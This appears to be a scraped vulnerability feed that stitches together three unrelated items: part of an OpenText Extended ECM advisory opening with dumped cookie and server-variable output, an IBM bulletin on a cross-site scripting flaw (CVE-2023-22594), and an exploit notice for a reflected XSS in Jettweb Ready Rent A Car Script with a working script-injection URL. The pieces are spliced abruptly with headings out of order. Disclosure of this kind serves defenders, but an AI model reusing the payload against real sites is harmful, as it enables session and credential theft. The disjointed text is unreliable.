AdminPwd=6GxYwSEETjgXlHwOyzNue7sSkSKHieE2XNh7qe6h1MxuNNd3GlbD7NqlcaouTXLJvE84KXliXoS3rv0OEAoPMjLs%2B5navCaRtW32FuEYDhEtcTAetQzTUyEMJk8gtywZrslSilkjG%2FZjMh0S5nNi2MmkzquGi2BsKuKaN3dMGjscqQErAY9aIxAx1r%2FE7Gdsx1Vdo5SdILV2VdgVtjuMP3ul7RBYvHL1OsV4MtPjhB7s%2Flv6TXzrTUMzv3J%2BiVRxmXhxb%2BzFIAu7zE4DckTnGYE3tTP%2Fg1qL0GKrxVuBJbQIaZPyotwqSA%3D%3D; TargetBrowseObjID=0; TargetBrowseObjType=150; LLCookie=gYjACLksaCQXFyPM6bXgZFWxLST0MIVxqrqP9KwByUPbF8bVCKwyShPhoC0iRNqSytsqY1YfoW6i7DE39j7RpfjB4XnTw36lAps80xrs9nDkSqy1rDYqUsdbsHHJFSWCV5IzVVrS%2FuvrWBvv4e0HcYVpbbeXAI4%2BTWhmSWqDIvD68rCVqrrvRQ%3D%3D; tl=public_timeline; Accordion=','HTTP_HOST'='opentext-dev','HTTP_UPGRADE_INSECURE_REQUESTS'='1','HTTP_USER_AGENT'='Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0','HTTPS'='off','HTTPS_KEYSIZE'='','HTTPS_SECRETKEYSIZE'='','HTTPS_SERVER_ISSUER'='','HTTPS_SERVER_SUBJECT'='','PATH_INFO'='','PATH_TRANSLATED'='C:\\inetpub\\wwwroot','QUERY_STRING'='func=commdirectory.LookFeel&objid=49259&menutype=375&htmlFile=temp/xml/XslOutput_2_3','REMOTE_ADDR'='$IP','REMOTE_HOST'='$IP','REMOTE_USER'='','REQUEST_METHOD'='GET','SCRIPT_NAME'='/OTCS/cs.exe','SERVER_NAME'='opentext-dev','SERVER_PORT'='80','SERVER_PROTOCOL'='HTTP/1.1','SERVER_SOFTWARE'='Microsoft-IIS/10.0'>,'LLPARAMS_LIST'=\{\{'func','commdirectory.LookFeel'},{'objid','49259'},{'menutype','375'},{'htmlFile','temp/xml/XslOutput_2_3'}},'LLSYSPARAMS_ASSOC'=A<1,?,'_uploadFilenames'={},'_uploadPath'='C:\\Windows\\TEMP\\'>,'menutype'=375,'objid'=49259,'PATH_INFO'='','PATH_TRANSLATED'='C:\\inetpub\\wwwroot','QUERY_STRING'='func=commdirectory.LookFeel&objid=49259&menutype=375&htmlFile=temp/xml/XslOutput_2_3','REMOTE_ADDR'='$IP','REMOTE_HOST'='$IP','REMOTE_USER'='','REQUEST_ID'='8f325fa0-7d39-42a7-bf8f-486cbcbf1042','REQUEST_METHOD'='GET','REQUEST_PROCESSING_DURATION'='0','SCRIPT_NAME'='/OTCS/cs.exe','SERVER_NAME'='opentext-dev','SERVER_PORT'='80','SERVER_PROTOCOL'='HTTP/1.1','SERVER_SOFTWARE'='Microsoft-IIS/10.0','cdid'=0,'prgCtx'=#323b0f9,'TZOffset'=0>
    
    </HTML>

**Vulnerable / tested versions**

The following version has been tested:

*   22.1 (16.2.19.1803)

The following versions are vulnerable according to the vendor:

*   CVE-2022-45924: 20.4   - 22.3
*   CVE-2022-45922: 21.1   - 22.1
*   CVE-2022-45925: 16.2.2 - 22.3
*   CVE-2022-45926: 20.4   - 22.3
*   CVE-2022-45928: 16.2.2 - 22.3

**Vendor contact timeline**

CVE-2022-45922: Multiple post-authentication vulnerabilities including RCE (OpenText™ Extended ECM)

IBM Robotic Process Automation for Cloud Pak 20.12.0 through 21.0.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 244075.

  

**Summary**

IBM Robotic Process Automation for Cloud Pak is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

**Vulnerability Details**

**CVEID:**   CVE-2023-22594  
**DESCRIPTION:**   IBM Robotic Process Automation for Cloud Pak is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 4.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244075 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation as a Service

< 21.0.5

IBM Robotic Process Automation

< 21.0.5

IBM Robotic Process Automation for Cloud Pak

< 21.0.5

  

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s) number and/or range** 

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

< 21.0.5

Download 21.0.5 and follow instructions.

IBM Robotic Process Automation for Cloud Pak

< 21.0.5

Download 21.0.5 and follow instructions.

IBM Robotic Process Automation as a Service

< 21.0.5

No action required as SaaS servers have been updated to 21.0.5 or later.

**Workarounds and Mitigations**

None.

**References**

Off

**Change History**

09 Jan 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF040","label":"RedHat OpenShift"}\],"Version":"20.12.X - 21.0.4","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-22594: IBM Robotic Process Automation is vulnerable to Cross-Site Scripting.

Jettweb Ready Rent A Car Script version 4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : Jettweb.net                                                                ││  Vendor   : Jettweb                                                                    ││  Software : Jettweb Ready Rent A Car Script V4                                         ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'id' is vulnerable to XSSPath: /rezervasyon.phphttps://example/rezervasyon.php?id=3mteyx%22%3e%3cscript%3ealert(1)%3c%2fscript%3esih3w[-] Done

Tag

#xss